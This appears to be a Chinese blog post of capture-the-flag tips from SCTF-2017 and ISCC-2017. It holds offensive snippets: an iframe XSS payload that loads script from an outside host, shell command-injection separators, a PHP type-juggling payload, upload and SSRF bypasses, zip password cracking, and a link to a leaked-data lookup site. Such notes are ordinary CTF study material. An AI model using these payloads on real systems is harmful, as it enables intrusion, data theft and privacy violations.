本文共 654 字,预计阅读时间 2 分钟。
SCTF-2017
- 签到MISC题什么的不会是什么高深的密码学,常规解码+栅栏+凯撒,比如这种:
Z2dRQGdRMWZxaDBvaHRqcHRfc3d7Z2ZoZ3MjfQ==
- Git题什么的可以直接用四叶草的GitHack(尤其是在做四叶草比赛的时候)
git clone https://github.com/BugScanTeam/GitHack
git log -u 查看历史提交记录
报错 refname '8894bb4d45643d52b5eb8175710999fcd398ebd4' is ambiguous. 可以考虑使用 git config advice.objectNameWarning false关闭报错。
- U2Fsd开头可能是AES加盐。一般会提示密码。
不提示就猜啊!
- 各种隐写都考虑一下 OurSecret 这个工具吧。一般会提示密码。
不提示就猜啊!
- 压缩包密码小技巧:
Step1 = 先跑一遍纯数字暴力。
Step2 = 伪协议,0x504B 开始9-10位,改为 0x0000 解压一次。或者直接用工具 ZipCenOp.jar 解压。
Step2 = 如果得到部分文件,剩下的文件可以选择已知明文攻击,将已知文件打包为另一个zip,用 Advanced Archive Password Recovery 即可。
再不行就猜啊!
- binwalk跑之前文件中有falg_balabala之类的可疑字样和一个有密码的压缩包,不如先试下密码。
- SSRF题,file协议和ftp协议大小写是无所谓的,FiLe和Ftp什么的也许是绕过的好方法。
顺便看下能不能扫到别的题目。。。
- Git题一脸懵逼的时候不妨去找一下私钥然后直接 git pull
ISCC-2017
- 密码位方形+圆点=猪圈密码。**又名共济会密码!**别错过了什么提示词。
- 嗯,压缩包还是先暴力一波纯数字的。
- 嗯,键盘四个字母围起来,也算是密码。3-4位一组算提示吧。
- cap握手包破解:aircrack工具
- 某个文件上传:PHP5 or PHT文件
- 某个弱类型: iscc={“bar1”:“2017a”,“bar2”:[[1],1,2,3,0]}&cat[0]=00isccctf2017&cat[1][]=1111&dog=%00}
- 音频前面某些部位有方波,之后莫尔斯码。
- MySQL会忽略字符集外的字符,用于绕过$_string! !== "admin",post数据结尾加入字符集外的字符。
- shell执行命令方式:
command和$(command)
shell连接命令方式:;、|、&、%0a
-
1
<iframe srcdoc="%80<script>window.parent.document.body.appendChild(window.parent.document.createElement('script')).src='http://x.x.x.x/1.js'</script>">
- 注入时如果GET过滤严格考虑一下POST
- IP地址的其他写法:ref:http://www.freebuf.com/articles/web/135342.html
- 社工库:http://s.70sec.com/
- MySQL预查询:
1 | SET @SQL=0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E74292056414C55455320282761616161272C27616161612729;PREPARE pord FROM @SQL;EXECUTE pord; |
其中0x494E5345525420494E544F206D6F76696520286E616D652C20636F6E74656E7429205 6414C55455320282761616161272C27616161612729可以解码为INSERT INTO movie (name, content) VALUES ('aaaa','aaaa')
1 | (未完也别待续了) |